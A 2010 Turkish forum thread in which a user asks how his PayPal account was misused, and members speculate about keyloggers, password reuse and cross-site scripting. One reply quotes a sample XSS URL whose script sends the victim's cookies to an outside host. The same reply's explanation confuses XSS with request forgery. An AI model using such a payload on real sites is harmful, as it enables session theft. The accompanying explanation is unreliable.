tomkat Mesaj tarihi: Haziran 10, 2010 Mesaj tarihi: Haziran 10, 2010 kullanan ve third party tarafindan accountu izinsiz kullanilan var mi? hack degil olay dun mail geldi paypal kullandiginiz icin sagouln, here's your receipt falan diye ibnenin biri 200 euro'luk mal almis almanya'dan benim hesabi kullanarak 10 saniye sonra paypal bi mail daha atti we believe that your account has been compromised tarzi bisey dedi direk complaint ticket'i actim, neyse is cozuldu bugun, para geri verildi soruyorum telefonda kadina bak guzel kardesim for the 50th time, how can i trust your organization if you refuse to give me information about how my account had been compromised lan diye kadin eeeoo would you like to reactivate your account now using 3 simple steps diyo hala neyse bunlardan bilgi alamiycagim kesin bi aciklari var ve soyleyemiyolar bilen biri var mi nasil hacklenmisim ben, ne metodla yapmislar bunu? cunku 2 aydir paypal'a girdigim yok, keylogger falan olmasi imkansiz, virus taramasi temiz cikti ne kaldi geriye? IT'ci varsa pls yardim
Silphatos Mesaj tarihi: Haziran 10, 2010 Mesaj tarihi: Haziran 10, 2010 paypal hesabını paypal'dan alamazlar orası kesin, yine büyük ihtimal paypal kullandığın bir site (scriptle paypal'ı açıp ödeme yaptıranlar) veya yine trojan/keylogger tarzı bir şeyle kaptırmışsın bence hesap bilgilerini.
tomkat Mesaj tarihi: Haziran 10, 2010 Konuyu açan Mesaj tarihi: Haziran 10, 2010 Silphatos said: paypal hesabını paypal'dan alamazlar orası kesin, yine büyük ihtimal paypal kullandığın bir site (scriptle paypal'ı açıp ödeme yaptıranlar) veya yine trojan/keylogger tarzı bir şeyle kaptırmışsın bence hesap bilgilerini. al history: 3 ay once verisign verified siteden alis veris yaptim 2 ay once your freedom enhanced package aldim 1 ay once blizz'den mobile authenticator aldim bu kadar hep alis veris yaptigim yerler yani
Friedman Mesaj tarihi: Haziran 10, 2010 Mesaj tarihi: Haziran 10, 2010 your freedomdan birinin başı daha yanmıştı burda sanki
reyou Mesaj tarihi: Haziran 10, 2010 Mesaj tarihi: Haziran 10, 2010 paypayle ole bi acik varmi bilmiyorum ama senin cross site scripting yapmis olabilirler, bunun disinda paylapde kullandigin email/password baska dandik forumlarda kullaniyosan ordan biri arak yapmis olabilir.
tomkat Mesaj tarihi: Haziran 10, 2010 Konuyu açan Mesaj tarihi: Haziran 10, 2010 abi keylogger olsa 1 ay once olurdu olay 1 aydir birak log in olmayi, paypal.com bile yazmadim noolduysa dun oldu
tomkat Mesaj tarihi: Haziran 10, 2010 Konuyu açan Mesaj tarihi: Haziran 10, 2010 reyou said: paypayle ole bi acik varmi bilmiyorum ama senin cross site scripting yapmis olabilirler, bunun disinda paylapde kullandigin email/password baska dandik forumlarda kullaniyosan ordan biri arak yapmis olabilir. cross site olayi nasil oluyor?
Silphatos Mesaj tarihi: Haziran 10, 2010 Mesaj tarihi: Haziran 10, 2010 illa ele geçirdiği an kullanacak diye bir şey yokki abi
reyou Mesaj tarihi: Haziran 10, 2010 Mesaj tarihi: Haziran 10, 2010 tomkat said: reyou said: paypayle ole bi acik varmi bilmiyorum ama senin cross site scripting yapmis olabilirler, bunun disinda paylapde kullandigin email/password baska dandik forumlarda kullaniyosan ordan biri arak yapmis olabilir. cross site olayi nasil oluyor? internetten buldugum ornegi veriyim http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> mesela sen bi siteye girdigin zaman o site paypal'e post gonderiyor, mesela 200 dolar su hesaba gec diye, eger sen o anda paypal e login olmussan ve cookie lerin yerinde duruyosa senin cookierine de birlikte gonderiyo. eksisozluge gecenlerde yapilan saldirinin bir benzeri. bolece sen sanki gonder dugmesine tiklaissin gibi oluyo.
tomkat Mesaj tarihi: Haziran 10, 2010 Konuyu açan Mesaj tarihi: Haziran 10, 2010 simdi o zaman ff'u her kapattigimda clear recent history yapicam saved passwords ile cookie ayni sey diil di mi?
razzRaziel Mesaj tarihi: Haziran 10, 2010 Mesaj tarihi: Haziran 10, 2010 paypal'in açık kalma gibi bir olayı yok ki 10 dk aktif olmadın mı atıyor seni hemen. büyük ihtimal senin hesap bilgileri çoktandır başkalarının elindeydi, aradan zaman geçtikten sonra ya da seninkine sıra geldiğinde harcama yaptılar.
Öne çıkan mesajlar